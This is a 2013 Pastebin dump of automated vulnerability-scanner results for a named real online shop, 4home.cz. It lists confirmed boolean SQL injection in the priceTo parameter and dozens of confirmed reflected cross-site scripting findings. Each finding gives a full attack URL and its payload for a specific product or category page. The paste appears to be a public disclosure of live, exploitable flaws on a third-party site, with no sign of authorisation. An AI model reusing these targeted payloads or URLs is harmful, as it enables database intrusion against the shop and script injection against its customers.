API tools faq
paste
Advertisement
sroub3k

4home.cz

sroub3k
Feb 3rd, 2013
245
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 43.74 KB | None | 0 0
raw download clone embed print report
  1. +++++++++++++++++++
  2. - http://www.4home.cz/
  3. +++++++++++++++++++
  4.  
  5. ||| Boolean Based SQL Injection
  6.  
  7. Severity: Critical
  8. Confirmation: Confirmed
  9. URL: http://www.4home.cz/bytovy-textil/?akce=1&novinky=1&priceFrom=69&priceTo=-1 OR 17-7=10&skladem=1&vyprodej=1
  10. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  11. Parameter Name: priceTo
  12. Parameter Type: Querystring
  13. Attack Pattern: -1 OR 17-7=10
  14.  
  15. Severity: Critical
  16. Confirmation: Confirmed
  17. URL: http://www.4home.cz/bytove-doplnky/?akce=1&novinky=1&priceFrom=29&priceTo=-1 OR 17-7=10&skladem=1&vyprodej=1
  18. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  19. Parameter Name: priceTo
  20. Parameter Type: Querystring
  21. Attack Pattern: -1 OR 17-7=10
  22.  
  23. Severity: Critical
  24. Confirmation: Confirmed
  25. URL: http://www.4home.cz/koupelna/?akce=1&novinky=1&priceFrom=65&priceTo=-1 OR 17-7=10&skladem=1&vyprodej=1
  26. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  27. Parameter Name: priceTo
  28. Parameter Type: Querystring
  29. Attack Pattern: -1 OR 17-7=10
  30.  
  31. Severity: Critical
  32. Confirmation: Confirmed
  33. URL: http://www.4home.cz/krasa-a-zdravi/?akce=1&novinky=1&priceFrom=49&priceTo=-1 OR 17-7=10&skladem=1&vyprodej=1
  34. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  35. Parameter Name: priceTo
  36. Parameter Type: Querystring
  37. Attack Pattern: -1 OR 17-7=10
  38.  
  39. ||| XSS (Cross-site Scripting)
  40.  
  41. Severity: Important
  42. Confirmation: Confirmed
  43. URL: http://www.4home.cz/.heureka.cz/direct/i/?'"--></style></script><script>alert(0x000059)</script>
  44. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  45. Parameter Name: Query Based
  46. Parameter Type: FullQueryString
  47. Attack Pattern: '"--></style></script><script>alert(0x000059)</script>
  48.  
  49. Severity: Important
  50. Confirmation: Confirmed
  51. URL: http://www.4home.cz/.heureka.cz/direct/?'"--></style></script><script>alert(0x00005E)</script>
  52. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  53. Parameter Name: Query Based
  54. Parameter Type: FullQueryString
  55. Attack Pattern: '"--></style></script><script>alert(0x00005E)</script>
  56.  
  57. Severity: Important
  58. Confirmation: Confirmed
  59. URL: http://www.4home.cz/.heureka.cz/?'"--></style></script><script>alert(0x000061)</script>
  60. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  61. Parameter Name: Query Based
  62. Parameter Type: FullQueryString
  63. Attack Pattern: '"--></style></script><script>alert(0x000061)</script>
  64.  
  65. Severity: Important
  66. Confirmation: Confirmed
  67. URL: http://www.4home.cz/.search.etargetnet.com/?'"--></style></script><script>alert(0x00007F)</script>
  68. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  69. Parameter Name: Query Based
  70. Parameter Type: FullQueryString
  71. Attack Pattern: '"--></style></script><script>alert(0x00007F)</script>
  72.  
  73. Severity: Important
  74. Confirmation: Confirmed
  75. URL: http://www.4home.cz/image.php?size='"--></style></script><script>alert(0x000043)</script>&file=miniatura-jpg-614.jpg
  76. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  77. Parameter Name: size
  78. Parameter Type: Querystring
  79. Attack Pattern: '"--></style></script><script>alert(0x000043)</script>
  80.  
  81. Severity: Important
  82. Confirmation: Confirmed
  83. URL: http://www.4home.cz/sunkovar-orion-5orn131505/?'"--></style></script><script>alert(0x0003E2)</script>
  84. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  85. Parameter Name: Query Based
  86. Parameter Type: FullQueryString
  87. Attack Pattern: '"--></style></script><script>alert(0x0003E2)</script>
  88.  
  89. Severity: Important
  90. Confirmation: Confirmed
  91. URL: http://www.4home.cz/.heureka.cz/direct/i/gjs.php/?'"--></style></script><script>alert(0x000434)</script>
  92. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  93. Parameter Name: Query Based
  94. Parameter Type: FullQueryString
  95. Attack Pattern: '"--></style></script><script>alert(0x000434)</script>
  96.  
  97. Severity: Important
  98. Confirmation: Confirmed
  99. URL: http://www.4home.cz/.search.etargetnet.com/rt.php/?'"--></style></script><script>alert(0x00045A)</script>
  100. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  101. Parameter Name: Query Based
  102. Parameter Type: FullQueryString
  103. Attack Pattern: '"--></style></script><script>alert(0x00045A)</script>
  104.  
  105. Severity: Important
  106. Confirmation: Confirmed
  107. URL: http://www.4home.cz/prikryvka-a-polstar-bila/?'"--></style></script><script>alert(0x00069C)</script>
  108. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  109. Parameter Name: Query Based
  110. Parameter Type: FullQueryString
  111. Attack Pattern: '"--></style></script><script>alert(0x00069C)</script>
  112.  
  113. Severity: Important
  114. Confirmation: Confirmed
  115. URL: http://www.4home.cz/prikryvka-aloe-vera-z-duteho-vlakna/?'"--></style></script><script>alert(0x0006AD)</script>
  116. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  117. Parameter Name: Query Based
  118. Parameter Type: FullQueryString
  119. Attack Pattern: '"--></style></script><script>alert(0x0006AD)</script>
  120.  
  121. Severity: Important
  122. Confirmation: Confirmed
  123. URL: http://www.4home.cz/sada-povleceni-a-polstarku-smoulinka/?'"--></style></script><script>alert(0x000691)</script>
  124. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  125. Parameter Name: Query Based
  126. Parameter Type: FullQueryString
  127. Attack Pattern: '"--></style></script><script>alert(0x000691)</script>
  128.  
  129. Severity: Important
  130. Confirmation: Confirmed
  131. URL: http://www.4home.cz/polstar-aloe-vera-z-duteho-vlakna/?'"--></style></script><script>alert(0x0006AC)</script>
  132. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  133. Parameter Name: Query Based
  134. Parameter Type: FullQueryString
  135. Attack Pattern: '"--></style></script><script>alert(0x0006AC)</script>
  136.  
  137. Severity: Important
  138. Confirmation: Confirmed
  139. URL: http://www.4home.cz/detske-bavlnene-povleceni-marie-cat/?'"--></style></script><script>alert(0x0006CB)</script>
  140. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  141. Parameter Name: Query Based
  142. Parameter Type: FullQueryString
  143. Attack Pattern: '"--></style></script><script>alert(0x0006CB)</script>
  144.  
  145. Severity: Important
  146. Confirmation: Confirmed
  147. URL: http://www.4home.cz/sada-fleecovych-prehozu-hneda-kostka/?'"--></style></script><script>alert(0x000711)</script>
  148. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  149. Parameter Name: Query Based
  150. Parameter Type: FullQueryString
  151. Attack Pattern: '"--></style></script><script>alert(0x000711)</script>
  152.  
  153. Severity: Important
  154. Confirmation: Confirmed
  155. URL: http://www.4home.cz/prehozy-na-sedaci-soupravu-potisk/?'"--></style></script><script>alert(0x00071F)</script>
  156. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  157. Parameter Name: Query Based
  158. Parameter Type: FullQueryString
  159. Attack Pattern: '"--></style></script><script>alert(0x00071F)</script>
  160.  
  161. Severity: Important
  162. Confirmation: Confirmed
  163. URL: http://www.4home.cz/deka-zebra/?'"--></style></script><script>alert(0x000730)</script>
  164. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  165. Parameter Name: Query Based
  166. Parameter Type: FullQueryString
  167. Attack Pattern: '"--></style></script><script>alert(0x000730)</script>
  168.  
  169. Severity: Important
  170. Confirmation: Confirmed
  171. URL: http://www.4home.cz/satenove-povleceni-karton/?'"--></style></script><script>alert(0x00070F)</script>
  172. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  173. Parameter Name: Query Based
  174. Parameter Type: FullQueryString
  175. Attack Pattern: '"--></style></script><script>alert(0x00070F)</script>
  176.  
  177. Severity: Important
  178. Confirmation: Confirmed
  179. URL: http://www.4home.cz/voalova-zaclona/?'"--></style></script><script>alert(0x000746)</script>
  180. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  181. Parameter Name: Query Based
  182. Parameter Type: FullQueryString
  183. Attack Pattern: '"--></style></script><script>alert(0x000746)</script>
  184.  
  185. Severity: Important
  186. Confirmation: Confirmed
  187. URL: http://www.4home.cz/pruhovane-voaly/?'"--></style></script><script>alert(0x00077E)</script>
  188. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  189. Parameter Name: Query Based
  190. Parameter Type: FullQueryString
  191. Attack Pattern: '"--></style></script><script>alert(0x00077E)</script>
  192.  
  193. Severity: Important
  194. Confirmation: Confirmed
  195. URL: http://www.4home.cz/povleceni-rosalina/?'"--></style></script><script>alert(0x000792)</script>
  196. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  197. Parameter Name: Query Based
  198. Parameter Type: FullQueryString
  199. Attack Pattern: '"--></style></script><script>alert(0x000792)</script>
  200.  
  201. Severity: Important
  202. Confirmation: Confirmed
  203. URL: http://www.4home.cz/voalove-zavesy/?'"--></style></script><script>alert(0x000761)</script>
  204. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  205. Parameter Name: Query Based
  206. Parameter Type: FullQueryString
  207. Attack Pattern: '"--></style></script><script>alert(0x000761)</script>
  208.  
  209. Severity: Important
  210. Confirmation: Confirmed
  211. URL: http://www.4home.cz/prehozy-na-sedaci-soupravu-canvas/?'"--></style></script><script>alert(0x000784)</script>
  212. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  213. Parameter Name: Query Based
  214. Parameter Type: FullQueryString
  215. Attack Pattern: '"--></style></script><script>alert(0x000784)</script>
  216.  
  217. Severity: Important
  218. Confirmation: Confirmed
  219. URL: http://www.4home.cz/bavlnene-povleceni-botanika/?'"--></style></script><script>alert(0x0007BB)</script>
  220. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  221. Parameter Name: Query Based
  222. Parameter Type: FullQueryString
  223. Attack Pattern: '"--></style></script><script>alert(0x0007BB)</script>
  224.  
  225. Severity: Important
  226. Confirmation: Confirmed
  227. URL: http://www.4home.cz/gobelinovy-prehoz-na-postel/?'"--></style></script><script>alert(0x0007A6)</script>
  228. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  229. Parameter Name: Query Based
  230. Parameter Type: FullQueryString
  231. Attack Pattern: '"--></style></script><script>alert(0x0007A6)</script>
  232.  
  233. Severity: Important
  234. Confirmation: Confirmed
  235. URL: http://www.4home.cz/bavlnene-povleceni-sofia/?'"--></style></script><script>alert(0x0007D9)</script>
  236. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  237. Parameter Name: Query Based
  238. Parameter Type: FullQueryString
  239. Attack Pattern: '"--></style></script><script>alert(0x0007D9)</script>
  240.  
  241. Severity: Important
  242. Confirmation: Confirmed
  243. URL: http://www.4home.cz/frote-rucniky/?'"--></style></script><script>alert(0x0008E3)</script>
  244. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  245. Parameter Name: Query Based
  246. Parameter Type: FullQueryString
  247. Attack Pattern: '"--></style></script><script>alert(0x0008E3)</script>
  248.  
  249. Severity: Important
  250. Confirmation: Confirmed
  251. URL: http://www.4home.cz/sada-3-plechovych-doz-s-vicky/?'"--></style></script><script>alert(0x0008CE)</script>
  252. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  253. Parameter Name: Query Based
  254. Parameter Type: FullQueryString
  255. Attack Pattern: '"--></style></script><script>alert(0x0008CE)</script>
  256.  
  257. Severity: Important
  258. Confirmation: Confirmed
  259. URL: http://www.4home.cz/zkrapeci-pekac-s-mrizkou/?'"--></style></script><script>alert(0x00090A)</script>
  260. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  261. Parameter Name: Query Based
  262. Parameter Type: FullQueryString
  263. Attack Pattern: '"--></style></script><script>alert(0x00090A)</script>
  264.  
  265. Severity: Important
  266. Confirmation: Confirmed
  267. URL: http://www.4home.cz/pekac-brownie/?'"--></style></script><script>alert(0x0008E8)</script>
  268. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  269. Parameter Name: Query Based
  270. Parameter Type: FullQueryString
  271. Attack Pattern: '"--></style></script><script>alert(0x0008E8)</script>
  272.  
  273. Severity: Important
  274. Confirmation: Confirmed
  275. URL: http://www.4home.cz/sklenene-misky-s-vicky/?'"--></style></script><script>alert(0x000900)</script>
  276. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  277. Parameter Name: Query Based
  278. Parameter Type: FullQueryString
  279. Attack Pattern: '"--></style></script><script>alert(0x000900)</script>
  280.  
  281. Severity: Important
  282. Confirmation: Confirmed
  283. URL: http://www.4home.cz/prehoz-na-postel-s-trasnemi/?'"--></style></script><script>alert(0x00091A)</script>
  284. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  285. Parameter Name: Query Based
  286. Parameter Type: FullQueryString
  287. Attack Pattern: '"--></style></script><script>alert(0x00091A)</script>
  288.  
  289. Severity: Important
  290. Confirmation: Confirmed
  291. URL: http://www.4home.cz/povlaky-na-polstarky-s-fototiskem/?'"--></style></script><script>alert(0x000944)</script>
  292. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  293. Parameter Name: Query Based
  294. Parameter Type: FullQueryString
  295. Attack Pattern: '"--></style></script><script>alert(0x000944)</script>
  296.  
  297. Severity: Important
  298. Confirmation: Confirmed
  299. URL: http://www.4home.cz/pvc-ubrus-jarni-probuzeni/?'"--></style></script><script>alert(0x000957)</script>
  300. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  301. Parameter Name: Query Based
  302. Parameter Type: FullQueryString
  303. Attack Pattern: '"--></style></script><script>alert(0x000957)</script>
  304.  
  305. Severity: Important
  306. Confirmation: Confirmed
  307. URL: http://www.4home.cz/solarni-dekorace-do-jezirka/?'"--></style></script><script>alert(0x000984)</script>
  308. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  309. Parameter Name: Query Based
  310. Parameter Type: FullQueryString
  311. Attack Pattern: '"--></style></script><script>alert(0x000984)</script>
  312.  
  313. Severity: Important
  314. Confirmation: Confirmed
  315. URL: http://www.4home.cz/pvc-ubrus-bily-s-krajkou/?'"--></style></script><script>alert(0x000973)</script>
  316. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  317. Parameter Name: Query Based
  318. Parameter Type: FullQueryString
  319. Attack Pattern: '"--></style></script><script>alert(0x000973)</script>
  320.  
  321. Severity: Important
  322. Confirmation: Confirmed
  323. URL: http://www.4home.cz/smetanovy-ubrus-s-dekoracnimi-behouny/?'"--></style></script><script>alert(0x000995)</script>
  324. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  325. Parameter Name: Query Based
  326. Parameter Type: FullQueryString
  327. Attack Pattern: '"--></style></script><script>alert(0x000995)</script>
  328.  
  329. Severity: Important
  330. Confirmation: Confirmed
  331. URL: http://www.4home.cz/svitici-kaminky/?'"--></style></script><script>alert(0x00099B)</script>
  332. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  333. Parameter Name: Query Based
  334. Parameter Type: FullQueryString
  335. Attack Pattern: '"--></style></script><script>alert(0x00099B)</script>
  336.  
  337. Severity: Important
  338. Confirmation: Confirmed
  339. URL: http://www.4home.cz/darkovy-snehulak/?'"--></style></script><script>alert(0x00099C)</script>
  340. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  341. Parameter Name: Query Based
  342. Parameter Type: FullQueryString
  343. Attack Pattern: '"--></style></script><script>alert(0x00099C)</script>
  344.  
  345. Severity: Important
  346. Confirmation: Confirmed
  347. URL: http://www.4home.cz/ratanove-houpaci-kreslo-kartini-wicker-mix/?'"--></style></script><script>alert(0x000B79)</script>
  348. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  349. Parameter Name: Query Based
  350. Parameter Type: FullQueryString
  351. Attack Pattern: '"--></style></script><script>alert(0x000B79)</script>
  352.  
  353. Severity: Important
  354. Confirmation: Confirmed
  355. URL: http://www.4home.cz/voskova-led-svicka-solight-s-dalkovym-ovladacem-kvadr/?'"--></style></script><script>alert(0x000B75)</script>
  356. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  357. Parameter Name: Query Based
  358. Parameter Type: FullQueryString
  359. Attack Pattern: '"--></style></script><script>alert(0x000B75)</script>
  360.  
  361. Severity: Important
  362. Confirmation: Confirmed
  363. URL: http://www.4home.cz/voskova-led-svicka-solight-valec-zluta/?'"--></style></script><script>alert(0x000B73)</script>
  364. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  365. Parameter Name: Query Based
  366. Parameter Type: FullQueryString
  367. Attack Pattern: '"--></style></script><script>alert(0x000B73)</script>
  368.  
  369. Severity: Important
  370. Confirmation: Confirmed
  371. URL: http://www.4home.cz/tristar-df-6500-bio-ethanol-krb/?'"--></style></script><script>alert(0x000B7B)</script>
  372. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  373. Parameter Name: Query Based
  374. Parameter Type: FullQueryString
  375. Attack Pattern: '"--></style></script><script>alert(0x000B7B)</script>
  376.  
  377. Severity: Important
  378. Confirmation: Confirmed
  379. URL: http://www.4home.cz/kapradinova-truhla/?'"--></style></script><script>alert(0x000B8A)</script>
  380. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  381. Parameter Name: Query Based
  382. Parameter Type: FullQueryString
  383. Attack Pattern: '"--></style></script><script>alert(0x000B8A)</script>
  384.  
  385. Severity: Important
  386. Confirmation: Confirmed
  387. URL: http://www.4home.cz/lucerna-s-andelem/?'"--></style></script><script>alert(0x000B83)</script>
  388. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  389. Parameter Name: Query Based
  390. Parameter Type: FullQueryString
  391. Attack Pattern: '"--></style></script><script>alert(0x000B83)</script>
  392.  
  393. Severity: Important
  394. Confirmation: Confirmed
  395. URL: http://www.4home.cz/kapradinova-zasuvka-do-skrine/?'"--></style></script><script>alert(0x000B89)</script>
  396. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  397. Parameter Name: Query Based
  398. Parameter Type: FullQueryString
  399. Attack Pattern: '"--></style></script><script>alert(0x000B89)</script>
  400.  
  401. Severity: Important
  402. Confirmation: Confirmed
  403. URL: http://www.4home.cz/stolni-lampa-rabalux-4901/?'"--></style></script><script>alert(0x000B91)</script>
  404. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  405. Parameter Name: Query Based
  406. Parameter Type: FullQueryString
  407. Attack Pattern: '"--></style></script><script>alert(0x000B91)</script>
  408.  
  409. Severity: Important
  410. Confirmation: Confirmed
  411. URL: http://www.4home.cz/sada-bilych-ruzi-5-kusu/?'"--></style></script><script>alert(0x000BA6)</script>
  412. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  413. Parameter Name: Query Based
  414. Parameter Type: FullQueryString
  415. Attack Pattern: '"--></style></script><script>alert(0x000BA6)</script>
  416.  
  417. Severity: Important
  418. Confirmation: Confirmed
  419. URL: http://www.4home.cz/solarni-svicen/?'"--></style></script><script>alert(0x000BAA)</script>
  420. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  421. Parameter Name: Query Based
  422. Parameter Type: FullQueryString
  423. Attack Pattern: '"--></style></script><script>alert(0x000BAA)</script>
  424.  
  425. Severity: Important
  426. Confirmation: Confirmed
  427. URL: http://www.4home.cz/priborove-hodiny-cerne/?'"--></style></script><script>alert(0x000C03)</script>
  428. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  429. Parameter Name: Query Based
  430. Parameter Type: FullQueryString
  431. Attack Pattern: '"--></style></script><script>alert(0x000C03)</script>
  432.  
  433. Severity: Important
  434. Confirmation: Confirmed
  435. URL: http://www.4home.cz/bioethanolovy-krb/?'"--></style></script><script>alert(0x000C10)</script>
  436. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  437. Parameter Name: Query Based
  438. Parameter Type: FullQueryString
  439. Attack Pattern: '"--></style></script><script>alert(0x000C10)</script>
  440.  
  441. Severity: Important
  442. Confirmation: Confirmed
  443. URL: http://www.4home.cz/ratanova-komoda/?'"--></style></script><script>alert(0x000C11)</script>
  444. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  445. Parameter Name: Query Based
  446. Parameter Type: FullQueryString
  447. Attack Pattern: '"--></style></script><script>alert(0x000C11)</script>
  448.  
  449. Severity: Important
  450. Confirmation: Confirmed
  451. URL: http://www.4home.cz/vinoteka-hyundai-vin32dz-78-l/?'"--></style></script><script>alert(0x000C0E)</script>
  452. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  453. Parameter Name: Query Based
  454. Parameter Type: FullQueryString
  455. Attack Pattern: '"--></style></script><script>alert(0x000C0E)</script>
  456.  
  457. Severity: Important
  458. Confirmation: Confirmed
  459. URL: http://www.4home.cz/vinoteka-hyundai-vin12a/?'"--></style></script><script>alert(0x000C21)</script>
  460. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  461. Parameter Name: Query Based
  462. Parameter Type: FullQueryString
  463. Attack Pattern: '"--></style></script><script>alert(0x000C21)</script>
  464.  
  465. Severity: Important
  466. Confirmation: Confirmed
  467. URL: http://www.4home.cz/retezovy-drzak-na-vino/?'"--></style></script><script>alert(0x000C23)</script>
  468. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  469. Parameter Name: Query Based
  470. Parameter Type: FullQueryString
  471. Attack Pattern: '"--></style></script><script>alert(0x000C23)</script>
  472.  
  473. Severity: Important
  474. Confirmation: Confirmed
  475. URL: http://www.4home.cz/pokojova-dekorace-slunecnice/?'"--></style></script><script>alert(0x000C22)</script>
  476. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  477. Parameter Name: Query Based
  478. Parameter Type: FullQueryString
  479. Attack Pattern: '"--></style></script><script>alert(0x000C22)</script>
  480.  
  481. Severity: Important
  482. Confirmation: Confirmed
  483. URL: http://www.4home.cz/bytove-doplnky/?akce=1&novinky=1&priceFrom=29'"--></style></script><script>alert(0x000C57)</script>&priceTo=7990&skladem=1&vyprodej=1
  484. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  485. Parameter Name: priceFrom
  486. Parameter Type: Querystring
  487. Attack Pattern: 29'"--></style></script><script>alert(0x000C57)</script>
  488.  
  489. Severity: Important
  490. Confirmation: Confirmed
  491. URL: http://www.4home.cz/varic-vajec/?'"--></style></script><script>alert(0x000E90)</script>
  492. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  493. Parameter Name: Query Based
  494. Parameter Type: FullQueryString
  495. Attack Pattern: '"--></style></script><script>alert(0x000E90)</script>
  496.  
  497. Severity: Important
  498. Confirmation: Confirmed
  499. URL: http://www.4home.cz/sendvicovac-eta-0151-90000/?'"--></style></script><script>alert(0x000E95)</script>
  500. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  501. Parameter Name: Query Based
  502. Parameter Type: FullQueryString
  503. Attack Pattern: '"--></style></script><script>alert(0x000E95)</script>
  504.  
  505. Severity: Important
  506. Confirmation: Confirmed
  507. URL: http://www.4home.cz/vyhrivany-polstar-ve-tvaru-srdce/?'"--></style></script><script>alert(0x000E91)</script>
  508. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  509. Parameter Name: Query Based
  510. Parameter Type: FullQueryString
  511. Attack Pattern: '"--></style></script><script>alert(0x000E91)</script>
  512.  
  513. Severity: Important
  514. Confirmation: Confirmed
  515. URL: http://www.4home.cz/ponorny-mixer-eta-1015-90000-spesso/?'"--></style></script><script>alert(0x000EF2)</script>
  516. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  517. Parameter Name: Query Based
  518. Parameter Type: FullQueryString
  519. Attack Pattern: '"--></style></script><script>alert(0x000EF2)</script>
  520.  
  521. Severity: Important
  522. Confirmation: Confirmed
  523. URL: http://www.4home.cz/citrusovac-eta-0037-90050-fruito/?'"--></style></script><script>alert(0x000EF4)</script>
  524. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  525. Parameter Name: Query Based
  526. Parameter Type: FullQueryString
  527. Attack Pattern: '"--></style></script><script>alert(0x000EF4)</script>
  528.  
  529. Severity: Important
  530. Confirmation: Confirmed
  531. URL: http://www.4home.cz/koupelnovy-ohrivac-tristar-ka-5010/?'"--></style></script><script>alert(0x000F04)</script>
  532. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  533. Parameter Name: Query Based
  534. Parameter Type: FullQueryString
  535. Attack Pattern: '"--></style></script><script>alert(0x000F04)</script>
  536.  
  537. Severity: Important
  538. Confirmation: Confirmed
  539. URL: http://www.4home.cz/ponorny-ohrivac-eta-0191-90060/?'"--></style></script><script>alert(0x000F06)</script>
  540. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  541. Parameter Name: Query Based
  542. Parameter Type: FullQueryString
  543. Attack Pattern: '"--></style></script><script>alert(0x000F06)</script>
  544.  
  545. Severity: Important
  546. Confirmation: Confirmed
  547. URL: http://www.4home.cz/indukcni-varic-eta-0110-90000-sklokeramicky/?'"--></style></script><script>alert(0x001015)</script>
  548. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  549. Parameter Name: Query Based
  550. Parameter Type: FullQueryString
  551. Attack Pattern: '"--></style></script><script>alert(0x001015)</script>
  552.  
  553. Severity: Important
  554. Confirmation: Confirmed
  555. URL: http://www.4home.cz/espresso-krups-kp150231-nescafe-dolce-gusto-genio-whitechocolate/?'"--></style></script><script>alert(0x001017)</script>
  556. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  557. Parameter Name: Query Based
  558. Parameter Type: FullQueryString
  559. Attack Pattern: '"--></style></script><script>alert(0x001017)</script>
  560.  
  561. Severity: Important
  562. Confirmation: Confirmed
  563. URL: http://www.4home.cz/rucni-slehac-eta-fresco-bila-1047-90010/?'"--></style></script><script>alert(0x001013)</script>
  564. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  565. Parameter Name: Query Based
  566. Parameter Type: FullQueryString
  567. Attack Pattern: '"--></style></script><script>alert(0x001013)</script>
  568.  
  569. Severity: Important
  570. Confirmation: Confirmed
  571. URL: http://www.4home.cz/rucni-slehac-eta-1088-90000-multiplo/?'"--></style></script><script>alert(0x001007)</script>
  572. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  573. Parameter Name: Query Based
  574. Parameter Type: FullQueryString
  575. Attack Pattern: '"--></style></script><script>alert(0x001007)</script>
  576.  
  577. Severity: Important
  578. Confirmation: Confirmed
  579. URL: http://www.4home.cz/usporna-friteza/?'"--></style></script><script>alert(0x00101D)</script>
  580. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  581. Parameter Name: Query Based
  582. Parameter Type: FullQueryString
  583. Attack Pattern: '"--></style></script><script>alert(0x00101D)</script>
  584.  
  585. Severity: Important
  586. Confirmation: Confirmed
  587. URL: http://www.4home.cz/elektricka-panev-concept-pk-9010-vitacera-darek/?'"--></style></script><script>alert(0x001024)</script>
  588. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  589. Parameter Name: Query Based
  590. Parameter Type: FullQueryString
  591. Attack Pattern: '"--></style></script><script>alert(0x001024)</script>
  592.  
  593. Severity: Important
  594. Confirmation: Confirmed
  595. URL: http://www.4home.cz/rucniky-venera-s-vysivanou-bordurou-2-kusy/?'"--></style></script><script>alert(0x00114D)</script>
  596. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  597. Parameter Name: Query Based
